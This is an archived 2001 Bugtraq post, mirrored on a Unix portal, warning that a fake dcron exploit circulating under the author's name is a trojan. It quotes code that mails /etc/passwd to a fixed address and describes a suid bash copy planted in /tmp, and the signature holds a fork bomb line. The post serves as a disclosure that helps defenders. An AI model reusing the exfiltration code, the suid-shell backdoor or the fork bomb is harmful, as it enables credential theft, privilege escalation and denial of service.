The OpenNET Project / Index page
BSD, Linux, Cisco, Web, Palm, other unix
RUSSIAN version

Search
Выпущена CD-версия OpenNet.RU для оффлайн просмотра.
Для формирования заказа - перейдите по ссылке
.
SOFT - Unix Software catalog
LINKS - Unix resources
TOPIC - Articles from usenet
DOCUMENTATION - Unix guides
News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

yet another fake exploit making rounds


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Thu, 20 Dec 2001 21:58:55 -0500 (EST)
From: Michal Zalewski <lcamtuf@coredump.cx>
To: bugtraq@securityfocus.com
Subject: yet another fake exploit making rounds
Cc: vuln-dev@securityfocus.com

Hello,

Most recent (third) issue of "el8" zine, available at http://el8.8m.com,
among other things claims to have a "0-day" dcron exploit, allegedely
coded by me and Rafal Wojtczuk (Nergal).

/*************************************************************************\
| ----====----====---- . . LOCAL  DCRON  EXPLOIT . . ----====----====---- |
|                                                                         |
|                            brought to you by                            |
|                                                                         |
| (C) Michal Zalewski <lcamtuf@ids.pl> . and . Nergal <nergal@icm.edu.pl> |
|                                                                         |
| ----------------------------------------------------------------------- |
| Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] |
| ----------------------------------------------------------------------- |
|                                                                         |
\*************************************************************************/

[...cut...]

This so-called exploit is already making rounds, not only in script kiddie
community, but also being run by many admins to test their boxes. I got
reports from several people letting me know "it did not work". I looked at
it, and it appears to be a very nicely crafted trojan horse. It does send
your /etc/passwd file to a fixed address your-address@mail.com (source
code suggests this is only a default, and can be changed by the victim,
but because of always true conditional expression, user-specified value is
overwritten later; this mailbox is probably valid and attended):

                        /.../
                        email_address=(char*)strdup(optarg);
                        break;
        /.../
        if(email_address) {
                email_address=DEFAULT_EMAIL_ADDRESS;
            }

        /.../
        fprintf(temp,"mail %s < /etc/passwd\n",email_address);

Other than that, this exploit will also create a suid copy of /bin/bash in
/tmp directory, named 'boomsh'. Even if it was not executed as root, it
still gives the attacker an opportunity to escalate privileges locally and
gain access to other accounts, perhaps after guessing at least one
password.

You probably do not want to run this exploit, the same applies to all
other exploits coming from untrusted sources =)

-- 
_____________________________________________________
Michal Zalewski [lcamtuf@bos.bindview.com] [security]
[http://lcamtuf.coredump.cx] <=-=> bash$ :(){ :|:&};:
=-=> Did you know that clones never use mirrors? <=-=
          http://lcamtuf.coredump.cx/photo/

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Закладки
Добавить в закладки
Created 1996-2003 by Maxim Chirkov  
ДобавитьРекламаВебмастеруЦУПГИД  
SpyLOG TopList
RB2 Network.
InterReklama Advertizing
Интерреклама. Интернет
RB2 Network.